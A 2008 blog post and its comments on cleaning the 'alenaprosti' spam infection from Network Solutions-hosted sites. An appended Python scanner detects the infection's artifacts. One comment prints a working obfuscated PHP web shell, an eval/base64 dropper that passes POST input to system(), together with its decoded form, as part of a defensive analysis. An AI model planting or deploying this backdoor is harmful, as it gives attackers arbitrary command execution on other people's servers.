Tuesday, July 22, 2008

Removing the alenaprosti Worm from Your Infected Files on Network Solutions' Host

I suppose some light on how to clean the infection out of your files is in order.

First, check your .htaccess for a rewrite rule directing requests for "alenaprosti" to a folder on your virtual host. Mine was a folder labeled "29". Delete this folder and all of its contents, and remove the rewrite rule from your .htaccess file.

Next, check all index files, whatever their extension (index.html, index.php, index.cgi, index.shtml, etc.), for code matching the regular expression <ul style=\"display:none;\">.*</ul> and delete it from each file.

Now, do a Google site search for "alenaprosti" on your domain. For example, search the following: "alenaprosti site:mydomain.com". For each of the results, visit the Google Webmasters site at www.google.com/webmasters/ and submit a URL removal. It wouldn't hurt to add a disallow for "alenaprosti" in your robots.txt file, either.

This should work in most instances, but until Network Solutions fixes their security leak, be prepared to do it all over again in a month.


donald said...

Any other information on this worm? I wondered what all of that crap was on my site.

James of all Trades said...

I sent out a mass email to about 75 of the affected clients last night, by looking up their WHOIS info.

Hopefully, this will spark an email explosion to Network Solutions' support and get them to act on it.

Sly Devil said...

I am the webmaster of a site that is hosted on a netsol box and we have become infected with the worm as well. Not sure how it happened, but I have found several inconspicuous .php files sprinkled around the directory structure of the site. All .htaccess files were fine.

The body of these files is:
<?php $X=basename(__FILE__); $l="aWYoJF9QT1NUWyJsaW5rIl0peyRzdW09c3Vic3RyKCRfUE9TVFsibGluayJdLCBzdHJsZW4oJF9QT1NUWyJsaW5rIl0pLTQsc3RybGVuKCRfUE9TVFsibGluayJdKS0xKTsgaWYoJHN1bT0iMWpYIil7JGxpbms9YmFzZTY0X2RlY29kZShzdWJzdHIoJF9QT1NUWyJsaW5rIl0sIDAsIHN0cmxlbigkX1BPU1RbImxpbmsiXSktNCkpOyBAc3lzdGVtKCRsaW5rKTt9fQ=="; eval(base64_decode($l)); ?>

The long string of characters above is decoded into this:
if ( $_POST["link"] ) {
    $sum = substr( $_POST["link"], strlen( $_POST["link"] ) - 4, strlen( $_POST["link"] ) - 1 );
    if ( $sum = "1jX" ) {
        $link = base64_decode( substr( $_POST["link"], 0, strlen( $_POST["link"] ) - 4 ) );
        @system( $link );
    }
}

And through the eval() function, this code virtually replaces what is in the original .php file and is then run. Essentially, the decoded code accepts text called "link" and decodes it. The code does a check to make sure it is valid and then it sends the "link" text to the system() function. The system() function will execute it on the server!! Very scary stuff!!! Whoever is in control of these .php files can do basically anything on the server.

Network Solutions really needs to get on top of this worm.

Anyway, have a look around for .php files and see what you come up with.
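
Added example (not part of the original post or its comments): a read-only Python scan of a site's document root for the three artifacts described above, namely the "alenaprosti" rewrite rule in .htaccess, the hidden <ul> block in index files, and .php files that eval() a base64 string. The function names, finding labels and sample files are this example's own assumptions, and the hidden-list pattern is made non-greedy.

```python
import os, re, tempfile

# Patterns from the post and comment above; finding labels are this example's own.
HTACCESS_RE = re.compile(r"^\s*Rewrite(?:Rule|Cond)\b.*alenaprosti", re.I | re.M)
# Non-greedy so one match never swallows legitimate markup between two lists.
HIDDEN_UL_RE = re.compile(r'<ul style="display:none;">.*?</ul>', re.I | re.S)
DROPPER_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)

def scan(docroot):
    """Walk docroot read-only and return sorted (relative_path, finding) pairs."""
    findings = []
    for dirpath, _dirs, files in os.walk(docroot):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="latin-1") as fh:
                    text = fh.read(2_000_000)  # cap the per-file read
            except OSError:
                continue  # unreadable file: skip it, do not abort the scan
            rel = os.path.relpath(path, docroot).replace(os.sep, "/")
            lower = name.lower()
            if lower == ".htaccess" and HTACCESS_RE.search(text):
                findings.append((rel, "htaccess-rewrite"))
            if lower.startswith("index.") and HIDDEN_UL_RE.search(text):
                findings.append((rel, "hidden-ul"))
            if lower.endswith(".php") and DROPPER_RE.search(text):
                findings.append((rel, "eval-base64"))
    return sorted(findings)

def strip_hidden_ul(text):
    """Return text with every hidden <ul> block removed (review matches first)."""
    return HIDDEN_UL_RE.sub("", text)

# Constructed sample files, not taken from a real infected site.
SAMPLES = {
    ".htaccess": "RewriteEngine On\nRewriteRule ^alenaprosti /29/ [L]\n",
    "index.html": '<p>Hi</p><ul style="display:none;">\n<li>spam</li>\n</ul><p>Bye</p>',
    "about/index.php": "<?php echo 'clean'; ?>",
    "img/t.php": '<?php $l="Q09OU1RSVUNURUQ="; eval(base64_decode($l)); ?>',
}

def demo():
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLES.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="latin-1") as fh:
                fh.write(body)
        return scan(root)
```

Call scan() on your own document root to list files to inspect. A legitimate page can also contain a hidden list or an eval() call, so treat each finding as a lead to review rather than proof of infection.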